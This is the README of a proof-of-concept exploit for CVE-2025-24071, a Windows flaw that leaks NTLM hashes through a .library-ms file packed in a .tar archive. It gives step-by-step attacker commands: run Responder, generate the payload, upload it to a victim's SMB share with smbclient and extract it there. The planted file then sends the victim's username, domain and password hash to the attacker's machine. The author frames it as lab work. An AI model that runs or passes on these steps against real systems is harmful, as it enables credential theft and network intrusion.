
Exploited CVE-2025-24071 via SMB by hosting a .library-ms file inside a .tar archive. Using tar x from smbclient, the payload is extracted server-side without user interaction. Responder captures the NTLM hash once the target accesses the library.
This is a PoC for exploiting CVE-2025-24071, a vulnerability in Windows that allows NTLM hash leakage via .library-ms files. This version diverges slightly from others by using a .tar archive instead of a .zip, which improves compatibility in SMB-only environments.
.tar instead of .zip?Most public PoCs use .zip to package the malicious .library-ms file. However, if you're working in a restricted SMB environment (e.g., only access via smbclient), ZIP files can't be extracted remotely. By using a .tar archive, you can extract the payload directly from the SMB share using the tar command built into smbclient, allowing remote deployment without needing user interaction.
Responder installed and runningResponder, impacket-smbserver, or samba)Start Responder on the correct interface:
sudo responder -I <interface>
Make sure the IP in the payload matches this interface.
python3 create_tar_poc.py
You’ll be prompted to enter:
This generates:
From your attacker machine, connect to the victim's SMB share using smbclient:
smbclient //<victim_ip>/<sharename> -U <USERNAME>
put exploit.tar
tar x exploit.tar
This will unpack the .library-ms into the share.
When the exploit.tar is extracted, the .library-ms file containing a malicious xml will connect to our SMB which is the active Responder on our machine, thus starting an authentication attempt using NTLM by sending a request containing the username, domain and the NTLM hash of the user's password, which we can later decrypt.
Coming soon...
Daniel Miranda Barcelona AKA Excal1bur | Based on the original work by 0x6rss, adapted for TAR-based SMB deployments in lab scenarios.